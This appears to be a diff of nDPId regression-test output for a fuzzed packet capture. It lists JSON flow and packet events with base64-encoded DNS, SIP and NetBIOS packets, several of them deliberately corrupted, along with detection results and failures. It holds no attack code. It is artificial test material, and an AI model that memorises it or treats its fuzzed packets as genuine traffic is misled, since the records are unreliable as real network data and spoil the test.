00997{"packet_event_id":1,"packet_event_name":"packet","packet_id":432,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":532,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":532,"pkt_l4_len":0,"thread_ts_msec":1120470473529,"pkt":"AODtCW69ADBUADRWCABFACVzAABAADcRiifU8iEjwKgBAhPEE8QB8jJ0U0lQLzIuMCA0MDEgbm9uY2UgaGFzIGNoYW5nZWQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyMjI3MzItNDY2NWQ3NzINCkNTZXE6IDc3IFJFR0lTVEVSDQpGcm9tOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz0zYTU4MTQxDQpUbzogPHNpcDp2b2kxODA2MkBzaXAuY3liZXJjaXR5LmRrPjt0YWc9MDAtMDQwODktMTcwMWI2ODMtMThlYzGqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":432,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498,"global_ts_msec":1120470473676} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":432,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":498,"global_ts_msec":1120470473676}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1120470474627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470474627,"pkt":"ADBUADRWAODtAW69CABFAABIa2MAAIARS+7AqAECwKgBAQrlADUANLH1d+oBgAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1120470474627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470474627,"pkt":"ADBUADRWAODtAW69CABFAABIa2MAAIARS+7AqAECwKgBAQrlADUANLH1d+oBgAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -829,8 +829,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1120470490640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470490640,"pkt":"ADBUADRWAODlAW69CABFAABEa2cAAIARS+7AqAECwKgBAQrmADUAMMHtYusAAAABAAAA6QAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1120470490640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470490640,"pkt":"ADBUADRWAODlAW69CABFAABEa2cAAIARS+7AqAECwKgBAQrmADUAMMHtYusAAAABAAAA6QAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00439{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470490640,"pkt":"AJLtAW69ADBUADRWCABFAABbAABADUARtz7AqAEBwKgBAgA1CuYAR6QBYuuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470490640,"pkt":"AJLtAW69ADBUADRWCABFAABbAABADUARtz7AqAEBwKgBAgA1CuYAR6QBYuuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470490642} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470490642}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1120470490782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470490782,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwCVzABPEE8QB7RaaU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3OCBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9M2EyZDBkYw0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0NC5kaz47dGFnPTAwLTk0JXMALTE3MDFiNmFiLTEzOTM1YzgzNA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyYWNlaXZlZD04MC4yMzAuMjE5cjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5SEc0YktucDYxMDAxODczLTQzYmViWWE1MTkyLjE2OC4xLjINCldXVy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9mY2U9IjE3MDFiNjliNDdiNTFjNmQ2NmM5ZTQ1MDNjNjc5YzIiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG30TUQ1DQpDb250ZW50Lf5lbmd0aDogMA0KDQo="} 01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1120470490782,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470490782,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwCVzABPEE8QB7RaaU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3OCBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9M2EyZDBkYw0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0NC5kaz47dGFnPTAwLTk0JXMALTE3MDFiNmFiLTEzOTM1YzgzNA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyYWNlaXZlZD04MC4yMzAuMjE5cjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5SEc0YktucDYxMDAxODczLTQzYmViWWE1MTkyLjE2OC4xLjINCldXVy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9mY2U9IjE3MDFiNjliNDdiNTFjNmQ2NmM5ZTQ1MDNjNjc5YzIiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG30TUQ1DQpDb250ZW50Lf5lbmd0aDogMA0KDQo="}
00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
@@ -840,8 +840,8 @@
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1120470492042,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIa2oAAIARS+fAqAE1wKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1120470492042,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIa2oAAIARS+fAqAE1wKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00413{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIayVzAIARS+bAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIayVzAIARS+bAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470494045} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470494045}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1120470494127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470494127,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa2wAAIARSuHAqAECwMIB\/wCJAIkAOltkhTcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_packet_id":1,"flow_last_seen":1120470494127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470494127,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa2wAAIARSuHAqAECwMIB\/wCJAIkAOltkhTcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
@@ -862,8 +862,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470509449,"flow_last_seen":1120470509449,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470509449,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"240.168.1.2","src_port":53,"dst_port":2792,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 